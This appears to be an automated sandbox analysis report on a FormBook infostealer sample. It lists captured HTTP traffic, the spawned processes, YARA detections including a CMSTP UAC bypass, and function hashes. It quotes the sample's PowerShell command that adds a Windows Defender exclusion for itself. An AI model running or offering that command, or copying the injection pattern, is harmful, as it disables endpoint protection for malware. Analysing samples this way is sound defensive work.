d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
Jun 5, 2024 15:09:33.311534882 CEST	212	IN	Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31 Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,
Jun 5, 2024 15:09:33.311573029 CEST	1236	IN	Data Raw: 31 2e 33 36 2c 30 2c 30 2c 31 2c 36 32 2c 31 31 2e 38 48 37 37 2e 32 63 2e 38 2c 30 2c 31 2e 35 2e 32 2c 31 2e 35 2c 31 2e 35 76 2e 39 63 2d 2e 31 2e 36 2d 2e 32 2c 31 2e 35 2d 31 2e 36 2c 31 2e 35 4d 39 37 2e 32 2c 33 35 2e 32 48 39 35 2e 31 61 Data Ascii: 1.36,0,0,1,62,11.8H77.2c.8,0,1.5.2,1.5,1.5v.9c-.1.6-.2,1.5-1.6,1.5M97.2,35.2H95.1a2.46,2.46,0,0,1-2.2-.9l-6-7.6H85.8v7a1.4,1.4,0,0,1-1.5,1.6H82.8c-1.1,0-1.7-.3-1.7-1.6V13.2c0-1.4.9-1.5,1.7-1.5h6.5c3.7,0,4.7.2,6.1,1.6s1.8,3.6,1.8,6.7c0,2.9-.8,4
Jun 5, 2024 15:09:33.311609030 CEST	212	IN	Data Raw: 4d 32 34 2e 39 2c 31 34 61 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2d 32 2e 33 2d 32 2e 33 48 33 2e 36 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 31 2e 33 2c 31 34 56 33 32 2e 37 41 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 30 2c 33 Data Ascii: M24.9,14a2.26,2.26,0,0,0-2.3-2.3H3.6A2.26,2.26,0,0,0,1.3,14V32.7A2.26,2.26,0,0,0,3.6,35H22.4a2.26,2.26,0,0,0,2.3-2.3C24.8,32.7,24.9,14,24.9,14Z" transform="translate(-1.3 -2.3)"/></svg></a></div></div>
Jun 5, 2024 15:09:33.311640024 CEST	1236	IN	Data Raw: 20 20 20 20 20 0d 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 Data Ascii: <div style="color:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-w
Jun 5, 2024 15:09:33.311676979 CEST	551	IN	Data Raw: 23 33 39 3b 69 73 74 61 6e 74 20 61 75 63 75 6e 20 63 6f 6e 74 65 6e 75 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73 Data Ascii: #39;istant aucun contenu.</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web è appena stato attivato. Ancora non c'è cont

Target ID:	0
Start time:	09:04:58
Start date:	05/06/2024
Path:	C:\Users\user\Desktop\H25iQbxCki.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\H25iQbxCki.exe"
Imagebase:	0x214ebb50000
File size:	841'692 bytes
MD5 hash:	61300540A2FCCD044D641329A7102E47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:04:58
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:05:05
Start date:	05/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:05:05
Start date:	05/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:05:05
Start date:	05/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	09:05:06
Start date:	05/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Imagebase:	0x20000
File size:	306'264 bytes
MD5 hash:	2B2AE2C9C5D693D2306EF388583B1A03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:05:06
Start date:	05/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Imagebase:
File size:	306'264 bytes
MD5 hash:	2B2AE2C9C5D693D2306EF388583B1A03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:05:06
Start date:	05/06/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7420 -s 1344
Imagebase:	0x7ff6db5a0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:05:09
Start date:	05/06/2024
Path:	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe"
Imagebase:	0x9f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:05:09
Start date:	05/06/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:05:11
Start date:	05/06/2024
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\chkdsk.exe"
Imagebase:	0x140000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:05:23
Start date:	05/06/2024
Path:	C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe"
Imagebase:	0x9f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:05:40
Start date:	05/06/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B96026B Relevance: 4.6, Strings: 2, Instructions: 2057COMMON

Download Yara Rule

Strings

uN!, xrefs: 00007FFD9B961549
A, xrefs: 00007FFD9B960786

Memory Dump Source

Source File: 00000000.00000002.1952532865.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_H25iQbxCki.jbxd

Similarity

API ID:
String ID: A$uN!
API String ID: 0-1802917967
Opcode ID: ea2b27c4d86196bb27ef0f3c790f76bd78c721e8a640922888e1e0688409311e
Instruction ID: 22424da6c97a3c3b5a580fc50abdb980bfc36b2c0ba2f68a22f3cfd11403717e
Opcode Fuzzy Hash: ea2b27c4d86196bb27ef0f3c790f76bd78c721e8a640922888e1e0688409311e
Instruction Fuzzy Hash: 08D25C71A1E7C98FE766DB6888E55A87FE0FF55300F0A05FED089CB0A7D9246906C741

Function 00007FFD9B88211D Relevance: 1.7, Strings: 1, Instructions: 494
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3CO_^, xrefs: 00007FFD9B88225E

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID: 3CO_^
API String ID: 0-3937211734
Opcode ID: 8d3a6c5e99a41fc1e73b62a3eea3eb885457d2a8e437300d6f6f31665d0a45d3
Instruction ID: 7b4352f03bd7c3043782caf420dab96db2a6dc9e988b7e8cde9583dc77dd2b13
Opcode Fuzzy Hash: 8d3a6c5e99a41fc1e73b62a3eea3eb885457d2a8e437300d6f6f31665d0a45d3
Instruction Fuzzy Hash: A5E1B021B19E4D4FE7A8FBAC94667B8A6D2EF9C350F0501B9D01DC72E7DD28AD018741

Function 00007FFD9B885608 Relevance: 1.7, Strings: 1, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFD9B885750

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: a2284aaba42277bb002eea5084b97ce6aae8aecd023b866ac62eebb7ca9230be
Instruction ID: bd1e78cb6328d5c55482dd9b48181012b1fc7184c99230a40ffc63edc2616e2b
Opcode Fuzzy Hash: a2284aaba42277bb002eea5084b97ce6aae8aecd023b866ac62eebb7ca9230be
Instruction Fuzzy Hash: 17B14A72B1EE4D0FE76CA768A8255B973E1EF99350B04417FE05AC31E7ED25AD028381

Function 00007FFD9B88CF41 Relevance: 1.4, Instructions: 1439
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbb59d6dc34273c884dc53e4e89eb62fd828b8178ddd38dd4b05af9c878ddf7
Instruction ID: 4804de0a2da6fa2c2dd32d1e3e6423660261fb5721c667a3d887d1b7df457925
Opcode Fuzzy Hash: 0fbb59d6dc34273c884dc53e4e89eb62fd828b8178ddd38dd4b05af9c878ddf7
Instruction Fuzzy Hash: 2DA25930A1DB4A8FE329DB28C4A44B5B7E1FF89304B1545BED49AC72B6DE35E942C740

Function 00007FFD9B89156A Relevance: 1.1, Instructions: 1133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd6937c46544c6e1d647152fc95086ae22633026daa4048bf9624ca6e00bf18e
Instruction ID: f7b1154078e2616184b97708ef581b35f42930be37e8e4f3165b9362e19f3e21
Opcode Fuzzy Hash: fd6937c46544c6e1d647152fc95086ae22633026daa4048bf9624ca6e00bf18e
Instruction Fuzzy Hash: C672673160DB4E4FE769EB68C4605B17BE1FF99300B1145BED48AC72A2DE34E946C781

Function 00007FFD9B885620 Relevance: 1.0, Instructions: 984COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb36220fe73c794786bc82808b99a4b89a6e23930df7382828dc4fa5e8539cb1
Instruction ID: f6abf3e58b452818ef981fda05878dc6aaf7e9197e7181d80d4a0ed8d6372a99
Opcode Fuzzy Hash: eb36220fe73c794786bc82808b99a4b89a6e23930df7382828dc4fa5e8539cb1
Instruction Fuzzy Hash: 40728A31A0EA8A8FE729DB1484616B437D1EF5B310F0541BDD48E8B5E7DE28B946C7A0

Function 00007FFD9B889D58 Relevance: .9, Instructions: 862COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651c73a9aa3a785c79f7629c5779b6002752eeef060a7075df90d9b39ee8ecab
Instruction ID: 45c26b91cbc3136a50ea7b58094816e89cdcbd6a1631ebf9a13a480087d90cfc
Opcode Fuzzy Hash: 651c73a9aa3a785c79f7629c5779b6002752eeef060a7075df90d9b39ee8ecab
Instruction Fuzzy Hash: E142F730B09A0D8FDB68EB68D865A7977E1FF58301B1501BDE05EC76A2DE34ED428781

Function 00007FFD9B88CAB9 Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef0c4518f859f4dfcbaf0b51128140542409f3c3a1a3a792cd04f542057125e
Instruction ID: 8a3b85c86b25c37345b57e513bee195ac028cd7bb24be2470720de63d631569e
Opcode Fuzzy Hash: 1ef0c4518f859f4dfcbaf0b51128140542409f3c3a1a3a792cd04f542057125e
Instruction Fuzzy Hash: ACF18C3160DF8A0FE329CB2884A557177D2FF99301B15467ED4DAC72B5DE38A942CB81

Function 00007FFD9B895CBC Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd10a1c89d4538e025a2017d8fb81323a76f458e77062e7bdb347a32930c6ef9
Instruction ID: 5d0e35dc7657c0ee088a3bba8701151380e604b6c39324da41e134bcdfe244f6
Opcode Fuzzy Hash: bd10a1c89d4538e025a2017d8fb81323a76f458e77062e7bdb347a32930c6ef9
Instruction Fuzzy Hash: D5416B3160D78D0FD71E9B3888551B67FD1EB86320B15C2BFD49ACB1A7DD24A80B8391

Function 00007FFD9B895D20 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5376e43dc5f0a74fceb675761346b6d96dfb0b9e5b305c66037eadb6dcd9adcc
Instruction ID: d769e6ba05ead348a60d87cca1d98dbd0f3d5d6546f170b13a45e0d24cc871db
Opcode Fuzzy Hash: 5376e43dc5f0a74fceb675761346b6d96dfb0b9e5b305c66037eadb6dcd9adcc
Instruction Fuzzy Hash: 13415B3160E38D0FD71E9B7488651A67FA6EB86310F1682BFD486CB1E7DD34990B8391

Function 00007FFD9B88FB7D Relevance: 1.6, APIs: 1, Instructions: 126
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B8993A1

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 19b3f51faf52aecb8a13ca6b158cfc4b1623810c6fdd82c66bd947cfcaa0e32d
Instruction ID: 474c24c0ae41d74981327de91bd33e25a573e04fd666911a6dbb74b78e3afc21
Opcode Fuzzy Hash: 19b3f51faf52aecb8a13ca6b158cfc4b1623810c6fdd82c66bd947cfcaa0e32d
Instruction Fuzzy Hash: CB31F831A0CA5C9FDB18DF9DD8496F97BE1EBA9721F04427FE049C3292CB606846C791

Function 00007FFD9B881EFA Relevance: 1.6, APIs: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B884201

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f23003712ddae001c38d610b772564afa005a01d5910a15793034130e8fbcaf9
Instruction ID: f339c820cc70d99512941e7e83f1053d1fd79427131bcc1762e61d9038d151db
Opcode Fuzzy Hash: f23003712ddae001c38d610b772564afa005a01d5910a15793034130e8fbcaf9
Instruction Fuzzy Hash: 7631E831A0CA0C8FDB1CDF98D8466F9BBE1EBA9321F10422FD04AD3251CB7068528B81

Function 00007FFD9B88416C Relevance: 1.6, APIs: 1, Instructions: 110
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B884201

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 252a10883fdb290b0fc89f291b000eb39880eabffbfb2b13cbb20ed35d8f8fe1
Instruction ID: 3e129caf322b96eecf2b1c0f70dedf2280a0cb1e84b3d6ecdfb7339687cbb3f3
Opcode Fuzzy Hash: 252a10883fdb290b0fc89f291b000eb39880eabffbfb2b13cbb20ed35d8f8fe1
Instruction Fuzzy Hash: 8431B631A0CA1C8FDB1CDF9CD8466F9BBE1EBA9321F14422FD049D3291CB7068568B81

Function 00007FFD9B88154D Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFD9B8815CF

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 6f07650d43e94848170f994f9b9b597d2aac533371663b2508cbe4cd5cdfb2e6
Instruction ID: a355505c8bee247eaeefe90d86204938e6f3b5172110be5d9793e231de1b1b48
Opcode Fuzzy Hash: 6f07650d43e94848170f994f9b9b597d2aac533371663b2508cbe4cd5cdfb2e6
Instruction Fuzzy Hash: 5E21A17190CB4C8FDB28DB98D84AAE97BF0EF55320F00425FD04AC3652DB60A845CB41

Function 00007FFD9B9610C9 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952532865.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915103bd0091a151fe707918540d3cbaaa072e8465def272adc457c1c0600767
Instruction ID: 32e5b1707d477276e5f3c01d9da7f6339f42a4b152f8647c1dcfb090c63716e8
Opcode Fuzzy Hash: 915103bd0091a151fe707918540d3cbaaa072e8465def272adc457c1c0600767
Instruction Fuzzy Hash: 53715A31A1DBCD8FDB66DB6888655A97BF0FF56304B0601FBD04AC71A7DA28AD06C341

Function 00007FFD9B961210 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952532865.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b960000_H25iQbxCki.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6d802cf6694dff5395bc9941f961c2d76e616e603aa73b49ccd90531f3547e
Instruction ID: ccf088041ce692705da176f0ccc2bb3d14c8173599ddc1a078717fff07edb097
Opcode Fuzzy Hash: 4d6d802cf6694dff5395bc9941f961c2d76e616e603aa73b49ccd90531f3547e
Instruction Fuzzy Hash: 0B311231A09A4D9FEF68DF58C8A99BCB7E0FF54304B06067AE41ED35A5DE24B941C780

Non-executed Functions

Function 00007FFD9B881155 Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

1O_^, xrefs: 00007FFD9B881301

Memory Dump Source

Source File: 00000000.00000002.1951089157.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_H25iQbxCki.jbxd

Similarity

API ID:
String ID: 1O_^
API String ID: 0-2749740877
Opcode ID: 68688b5fdd48e7518635b3ed01bbcd13e6a0ae63b5a384a8e579a1887b2e3bb0
Instruction ID: a90a552158a0518c6459110b583084867b5bf2cd99e43ee983649319de603ec0
